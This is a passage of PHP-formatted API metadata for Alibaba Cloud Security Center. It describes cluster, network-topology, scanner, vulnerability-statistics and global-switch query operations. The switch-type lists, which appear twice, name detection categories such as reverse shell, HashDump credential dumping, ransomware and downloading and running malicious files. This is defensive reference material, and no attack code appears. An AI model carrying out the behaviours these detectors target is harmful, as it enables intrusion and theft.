'7E0618A9-D5EF-4220-9471-C42B5E92719F', 'title' => ''], 'ClusterList' => [ 'description' => 'An array that consists of the information about clusters.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the cluster.'."\n", 'type' => 'object', 'properties' => [ 'State' => ['description' => 'The status of the cluster. Valid values:'."\n" ."\n" .'* **unavailable**: The cluster is unavailable.'."\n" .'* **Available**: The cluster is available.'."\n" .'* **Creating**: The cluster is being created.'."\n" .'* **CreateFailed**: The cluster failed to be created.'."\n", 'type' => 'string', 'example' => 'Available', 'title' => ''], 'ClusterType' => ['description' => 'The type of the cluster. Valid values:'."\n" ."\n" .'* **ManagedKubernetes**: managed Kubernetes cluster.'."\n" .'* **NotManagedKubernetes**: non-managed Kubernetes cluster.'."\n" .'* **PrivateKubernetes**: private cluster.'."\n" .'* **kubernetes**: dedicated Kubernetes cluster.'."\n" .'* **ask**: dedicated serverless Kubernetes (ASK) cluster.'."\n", 'type' => 'string', 'example' => 'ManagedKubernetes', 'title' => ''], 'ClusterName' => ['description' => 'The name of the container cluster.'."\n", 'type' => 'string', 'example' => 'test111', 'title' => ''], 'ClusterId' => ['description' => 'The ID of the container cluster.'."\n", 'type' => 'string', 'example' => 'cfeb7a9f99ce740e98c5595d0fe37****', 'title' => ''], 'RegionId' => ['description' => 'The region in which the cluster resides.'."\n", 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'TargetResult' => ['description' => 'Indicates whether container network topology was enabled. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribeClusterInfoList', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeClusterInfoList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeClusterInfoList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\",\\n \\"ClusterList\\": [\\n {\\n \\"State\\": \\"Available\\",\\n \\"ClusterType\\": \\"ManagedKubernetes\\",\\n \\"ClusterName\\": \\"test111\\",\\n \\"ClusterId\\": \\"cfeb7a9f99ce740e98c5595d0fe37****\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"TargetResult\\": true\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeClusterNetwork' => [ 'summary' => 'Retrieves information about the network topology edge by cluster.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The start timestamp of the query. Unit: milliseconds.'."\n" ."\n" .'> The days between the start timestamp and the end timestamp cannot exceed **seven** days.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '1656038740435', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The end timestamp of the query. Unit: milliseconds.'."\n" ."\n" .'> The days between the start timestamp and the end timestamp cannot exceed **seven** days.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '1656038940435', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The data returned.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => 'C286491D-4A2F-589A-B63B-D2AD3DA9BD71', 'title' => ''], 'ClusterNetwork' => [ 'description' => 'Information about the network topology edge in the cluster.', 'type' => 'object', 'properties' => [ 'Node' => [ 'description' => 'An array that consists of information about the node.', 'type' => 'array', 'items' => [ 'description' => 'The node information.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the node. Valid values:'."\n" ."\n" .'- **cluster**: a cluster.'."\n" ."\n" .'- **internet**: a network node outside the cluster.', 'type' => 'string', 'example' => 'cluster', 'title' => ''], 'RiskLevel' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **3**: high.'."\n" ."\n" .'- **2**: medium.'."\n" ."\n" .'- **1**: low.'."\n" ."\n" .'- **0**: secure.'."\n" ."\n" .'- **-1**: unknown.', 'type' => 'string', 'example' => '3', 'title' => ''], 'NetTopoSwitch' => ['description' => 'The status of the network topology switch. Valid values:'."\n" ."\n" .'- **ON**'."\n" ."\n" .'- **OFF**', 'type' => 'string', 'example' => 'ON', 'title' => ''], 'InterceptionType' => ['description' => 'The network type. Valid values:'."\n" ."\n" .'- **0**: classic network.'."\n" ."\n" .'- **1**: virtual private cloud (VPC).', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'CnnfSwitch' => ['description' => 'The status of the microsegmentation switch. Valid values:'."\n" ."\n" .'- **0**: off.'."\n" ."\n" .'- **1**: on.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Name' => ['description' => 'The name of the node.', 'type' => 'string', 'example' => 'testwww', 'title' => ''], 'Id' => ['description' => 'The ID of the node.', 'type' => 'string', 'example' => 'cfeb7a9f99ce740e98c5595d0fe37****'."\n", 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Edge' => [ 'description' => 'An array that consists of information about the topology edge.', 'type' => 'array', 'items' => [ 'description' => 'Information about the topology edge.', 'type' => 'object', 'properties' => [ 'DstNodeId' => ['description' => 'The ID of the destination node.', 'type' => 'string', 'example' => 'cfb41a869c71e4678a97021582dd8****', 'title' => ''], 'Port' => ['description' => 'The port number of the topology edge.', 'type' => 'string', 'example' => '6164', 'title' => ''], 'SrcNodeId' => ['description' => 'The ID of the source node.', 'type' => 'string', 'example' => 'cfb41a869c71e4678a97021582dd8****', 'title' => ''], 'SrcNodeType' => ['description' => 'The type of the source node. Valid values:'."\n" ."\n" .'- **cluster**: a cluster.'."\n" ."\n" .'- **internet**: a network node outside the cluster', 'type' => 'string', 'example' => 'cluster', 'title' => ''], 'DstNodeType' => ['description' => 'The type of the destination node. Valid values:'."\n" ."\n" .'- Set the value to **cluster**.', 'type' => 'string', 'example' => 'cluster', 'title' => ''], 'Id' => ['description' => 'The ID of the topology edge.', 'type' => 'string', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"C286491D-4A2F-589A-B63B-D2AD3DA9BD71\\",\\n \\"ClusterNetwork\\": {\\n \\"Node\\": [\\n {\\n \\"Type\\": \\"cluster\\",\\n \\"RiskLevel\\": \\"3\\",\\n \\"NetTopoSwitch\\": \\"ON\\",\\n \\"InterceptionType\\": 1,\\n \\"CnnfSwitch\\": 1,\\n \\"Name\\": \\"testwww\\",\\n \\"Id\\": \\"cfeb7a9f99ce740e98c5595d0fe37****\\\\n\\"\\n }\\n ],\\n \\"Edge\\": [\\n {\\n \\"DstNodeId\\": \\"cfb41a869c71e4678a97021582dd8****\\",\\n \\"Port\\": \\"6164\\",\\n \\"SrcNodeId\\": \\"cfb41a869c71e4678a97021582dd8****\\",\\n \\"SrcNodeType\\": \\"cluster\\",\\n \\"DstNodeType\\": \\"cluster\\",\\n \\"Id\\": \\"1\\"\\n }\\n ]\\n }\\n}","type":"json"}]', 'title' => 'DescribeClusterNetwork', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeClusterNetwork'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeClusterNetwork', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeClusterScannerList' => [ 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages.'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'ClusterIdList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of cluster IDs.', 'type' => 'array', 'items' => ['description' => 'The cluster ID.', 'type' => 'string', 'required' => false, 'example' => '"c857d908016794125883a9ee8196c****"', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'StatusList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of scanner statuses. Valid values:'."\n" .'- **online**: running'."\n" .'- **offline**: offline'."\n" .'- **not_installed**: not installed', 'type' => 'array', 'items' => ['description' => 'The scanner status.', 'type' => 'string', 'required' => false, 'example' => 'online', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'InstalledCount' => ['description' => 'The number of clusters that have the scanner installed.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '11C96623-E106-59C9-866D-A6C82911459F', 'title' => ''], 'List' => [ 'description' => 'The list of clusters.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The scanner status. Valid values:'."\n" .'- **online**: running'."\n" .'- **offline**: offline'."\n" .'- **not_installed**: not installed', 'type' => 'string', 'example' => 'offline', 'title' => ''], 'LastTime' => ['description' => 'The most recent heartbeat time.', 'type' => 'integer', 'format' => 'int64', 'example' => '1693446913000', 'title' => ''], 'Version' => ['description' => 'The version number.', 'type' => 'string', 'example' => '20241111', 'title' => ''], 'NeedUpdate' => ['description' => 'Indicates whether an upgrade is required.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'WebhookOpen' => ['description' => 'Indicates whether incremental scanning is enabled. Valid values:'."\n" .'- **0**: Disabled.'."\n" .'- **1**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'WebhookStatus' => ['description' => 'The component status of incremental scanning. Valid values:'."\n" .'- **n**: not deployed'."\n" .'- **y**: deployed', 'type' => 'string', 'example' => 'n', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'View cluster scanner list', 'summary' => 'Queries the scanner status information for a Kubernetes cluster.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeClusterScannerList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeClusterScannerList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"InstalledCount\\": 1,\\n \\"RequestId\\": \\"11C96623-E106-59C9-866D-A6C82911459F\\",\\n \\"List\\": [\\n {\\n \\"Status\\": \\"offline\\",\\n \\"LastTime\\": 1693446913000,\\n \\"Version\\": \\"20241111\\",\\n \\"NeedUpdate\\": true,\\n \\"WebhookOpen\\": 1,\\n \\"WebhookStatus\\": \\"n\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeClusterVulStatistics' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster.', 'type' => 'string', 'required' => false, 'example' => 'c471f0f61b9c04f8380556e922cf1****', 'title' => ''], ], [ 'name' => 'Types', 'in' => 'query', 'schema' => ['description' => 'The type of vulnerability that you want to query. Valid values:'."\n" ."\n" .'- **cve**: Linux software vulnerabilities'."\n" .'- **app**: application vulnerabilities'."\n" .'- **sca**: software composition analysis (SCA) vulnerabilities', 'type' => 'string', 'required' => false, 'example' => 'cve,app,sca', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '0B48AB3C-84FC-424D-A01D-B9270EF46038', 'title' => ''], 'VulStat' => [ 'description' => 'The vulnerability statistics.', 'type' => 'object', 'properties' => [ 'AsapCount' => ['description' => 'The number of high-severity vulnerabilities.', 'type' => 'string', 'example' => '13', 'title' => ''], 'LaterCount' => ['description' => 'The number of medium-severity vulnerabilities.', 'type' => 'string', 'example' => '21', 'title' => ''], 'NntfCount' => ['description' => 'The number of low-severity vulnerabilities.', 'type' => 'string', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query cluster vulnerability statistics', 'summary' => 'Queries cluster vulnerability statistics.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeClusterVulStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeClusterVulStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0B48AB3C-84FC-424D-A01D-B9270EF46038\\",\\n \\"VulStat\\": {\\n \\"AsapCount\\": \\"13\\",\\n \\"LaterCount\\": \\"21\\",\\n \\"NntfCount\\": \\"0\\"\\n }\\n}","type":"json"}]', ], 'DescribeCommonOverallConfig' => [ 'summary' => 'Queries the global configuration of the master switch.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92030', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '59.61.XX.XX', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The configuration type. Valid values:'."\n" ."\n" .'- **kdump_switch**: proactive defense optimization'."\n" .'- **threat_detect**: adaptive threat detection'."\n" .'- **suspicious_aggregation**: alert association'."\n" .'- **alidetect**: file detection'."\n" .'- **USER-ENABLE-SWITCH-TYPE_3277**: suspicious process startup'."\n" .'- **USER-ENABLE-SWITCH-TYPE_5507**: malicious driver'."\n" .'- **USER-ENABLE-SWITCH-TYPE_38857**: entry service performing high-risk operations'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50858**: web service performing high-risk operations'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50859**: entry service performing suspicious operations'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50861**: information probing'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50862**: Cloud Assistant advanced protection'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50867**: malicious file implantation'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50868**: suspicious file implantation'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50869**: unauthorized execution of high-risk commands'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50870**: reverse shell'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50873**: WebShell command execution'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50876**: anti-security software'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50877**: malicious program communication'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50884**: suspicious worm script behavior'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50885**: malicious script behavior'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50983**: obfuscated commands'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51200**: downloading and running malicious files from the command line'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51201**: ransomware'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51202**: suspicious ransomware behavior'."\n" .'- **USER-ENABLE-SWITCH-TYPE_53168**: process debugging'."\n" .'- **USER-ENABLE-SWITCH-TYPE_53272**: privilege escalation by exploiting kernel vulnerabilities'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54034**: internal network scanning'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54265**: PAM module hijacking'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54395**: unauthorized read/write of sensitive files'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54699**: dynamic-link library hijacking'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54953**: HashDump attack'."\n" .'- **USER-ENABLE-SWITCH-TYPE_57897**: suspected privilege escalation behavior'."\n" .'- **USER-ENABLE-SWITCH-TYPE_62981**: bypassing security monitoring'."\n" .'- **USER-ENABLE-SWITCH-TYPE_64025**: entry service command execution [enhanced mode]'."\n" .'- **USER-ENABLE-SWITCH-TYPE_39659**: sensitive registry key protection'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51225**: Powershell executing high-risk commands'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51226**: Powershell executing suspicious commands'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51228**: high-risk lateral movement tools'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51229**: browser service performing high-risk operations'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51230**: entry service performing suspicious operations'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51232**: system process performing high-risk operations'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51233**: Java service performing high-risk operations'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51234**: Office component performing high-risk operations'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51235**: web service performing high-risk operations'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51236**: reverse shell'."\n" .'- **USER-ENABLE-SWITCH-TYPE_52815**: loading high-risk drivers'."\n" .'- **USER-ENABLE-SWITCH-TYPE_52816**: high-risk account manipulation'."\n" .'- **USER-ENABLE-SWITCH-TYPE_52818**: information probing'."\n" .'- **USER-ENABLE-SWITCH-TYPE_52820**: malicious file implantation'."\n" .'- **USER-ENABLE-SWITCH-TYPE_52821**: suspicious process startup'."\n" .'- **USER-ENABLE-SWITCH-TYPE_52823**: running high-risk ARK tools'."\n" .'- **USER-ENABLE-SWITCH-TYPE_52825**: unauthorized execution of high-risk commands'."\n" .'- **USER-ENABLE-SWITCH-TYPE_52826**: entry service performing high-risk operations'."\n" .'- **USER-ENABLE-SWITCH-TYPE_52827**: ransomware'."\n" .'- **USER-ENABLE-SWITCH-TYPE_52828**: suspicious ransomware behavior'."\n" .'- **USER-ENABLE-SWITCH-TYPE_52829**: system backup deletion behavior'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54168**: LSA security authority service protection'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54365**: creating service auto-start items'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54366**: creating high-risk auto-start items'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54367**: creating scheduled task auto-start items'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54368**: creating registry auto-start items'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54369**: creating WMI auto-start items'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54373**: anti-security software'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54374**: intrusion trace cleanup'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54384**: HashDump attack'."\n" .'- **USER-ENABLE-SWITCH-TYPE_55251**: database service performing high-risk operations'."\n" .'- **USER-ENABLE-SWITCH-TYPE_57242**: malicious command execution'."\n" .'- **USER-ENABLE-SWITCH-TYPE_57340**: downloading and running malicious files from the command line'."\n" .'- **USER-ENABLE-SWITCH-TYPE_62357**: Cloud Assistant service information probing'."\n" .'- **USER-ENABLE-SWITCH-TYPE_63725**: entry service implanting suspicious scripts or binary files.', 'type' => 'string', 'required' => true, 'example' => 'kdump_switch', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '6D9CDB47-6191-4415-BE63-7E8B12CD4FBE', 'title' => ''], 'OverallConfig' => [ 'description' => 'The configuration information.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The configuration type. Valid values:'."\n" ."\n" .'- **kdump_switch**: proactive defense optimization'."\n" .'- **threat_detect**: adaptive threat detection'."\n" .'- **suspicious_aggregation**: alert association'."\n" .'- **alidetect**: file detection'."\n" .'- **USER-ENABLE-SWITCH-TYPE_3277**: suspicious process startup'."\n" .'- **USER-ENABLE-SWITCH-TYPE_5507**: malicious driver'."\n" .'- **USER-ENABLE-SWITCH-TYPE_38857**: entry service performing high-risk operations'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50858**: web service performing high-risk operations'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50859**: entry service performing suspicious operations'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50861**: information probing'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50862**: Cloud Assistant advanced protection'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50867**: malicious file implantation'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50868**: suspicious file implantation'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50869**: unauthorized execution of high-risk commands'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50870**: reverse shell'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50873**: WebShell command execution'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50876**: anti-security software'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50877**: malicious program communication'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50884**: suspicious worm script behavior'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50885**: malicious script behavior'."\n" .'- **USER-ENABLE-SWITCH-TYPE_50983**: obfuscated commands'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51200**: downloading and running malicious files from the command line'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51201**: ransomware'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51202**: suspicious ransomware behavior'."\n" .'- **USER-ENABLE-SWITCH-TYPE_53168**: process debugging'."\n" .'- **USER-ENABLE-SWITCH-TYPE_53272**: privilege escalation by exploiting kernel vulnerabilities'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54034**: internal network scanning'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54265**: PAM module hijacking'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54395**: unauthorized read/write of sensitive files'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54699**: dynamic-link library hijacking'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54953**: HashDump attack'."\n" .'- **USER-ENABLE-SWITCH-TYPE_57897**: suspected privilege escalation behavior'."\n" .'- **USER-ENABLE-SWITCH-TYPE_62981**: bypassing security monitoring'."\n" .'- **USER-ENABLE-SWITCH-TYPE_64025**: entry service command execution [enhanced mode]'."\n" .'- **USER-ENABLE-SWITCH-TYPE_39659**: sensitive registry key protection'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51225**: Powershell executing high-risk commands'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51226**: Powershell executing suspicious commands'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51228**: high-risk lateral movement tools'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51229**: browser service performing high-risk operations'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51230**: entry service performing suspicious operations'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51232**: system process performing high-risk operations'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51233**: Java service performing high-risk operations'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51234**: Office component performing high-risk operations'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51235**: web service performing high-risk operations'."\n" .'- **USER-ENABLE-SWITCH-TYPE_51236**: reverse shell'."\n" .'- **USER-ENABLE-SWITCH-TYPE_52815**: loading high-risk drivers'."\n" .'- **USER-ENABLE-SWITCH-TYPE_52816**: high-risk account manipulation'."\n" .'- **USER-ENABLE-SWITCH-TYPE_52818**: information probing'."\n" .'- **USER-ENABLE-SWITCH-TYPE_52820**: malicious file implantation'."\n" .'- **USER-ENABLE-SWITCH-TYPE_52821**: suspicious process startup'."\n" .'- **USER-ENABLE-SWITCH-TYPE_52823**: running high-risk ARK tools'."\n" .'- **USER-ENABLE-SWITCH-TYPE_52825**: unauthorized execution of high-risk commands'."\n" .'- **USER-ENABLE-SWITCH-TYPE_52826**: entry service performing high-risk operations'."\n" .'- **USER-ENABLE-SWITCH-TYPE_52827**: ransomware'."\n" .'- **USER-ENABLE-SWITCH-TYPE_52828**: suspicious ransomware behavior'."\n" .'- **USER-ENABLE-SWITCH-TYPE_52829**: system backup deletion behavior'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54168**: LSA security authority service protection'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54365**: creating service auto-start items'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54366**: creating high-risk auto-start items'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54367**: creating scheduled task auto-start items'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54368**: creating registry auto-start items'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54369**: creating WMI auto-start items'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54373**: anti-security software'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54374**: intrusion trace cleanup'."\n" .'- **USER-ENABLE-SWITCH-TYPE_54384**: HashDump attack'."\n" .'- **USER-ENABLE-SWITCH-TYPE_55251**: database service performing high-risk operations'."\n" .'- **USER-ENABLE-SWITCH-TYPE_57242**: malicious command execution'."\n" .'- **USER-ENABLE-SWITCH-TYPE_57340**: downloading and running malicious files from the command line'."\n" .'- **USER-ENABLE-SWITCH-TYPE_62357**: Cloud Assistant service information probing'."\n" .'- **USER-ENABLE-SWITCH-TYPE_63725**: entry service implanting suspicious scripts or binary files.', 'type' => 'string', 'example' => 'kdump_switch', 'title' => ''], 'Config' => ['description' => 'The switch status. Valid values:'."\n" ."\n" .'- **on**: Enabled.'."\n" .'- **off**: Disabled.', 'type' => 'string', 'example' => 'on', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Master switch global configuration', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCommonOverallConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCommonOverallConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => 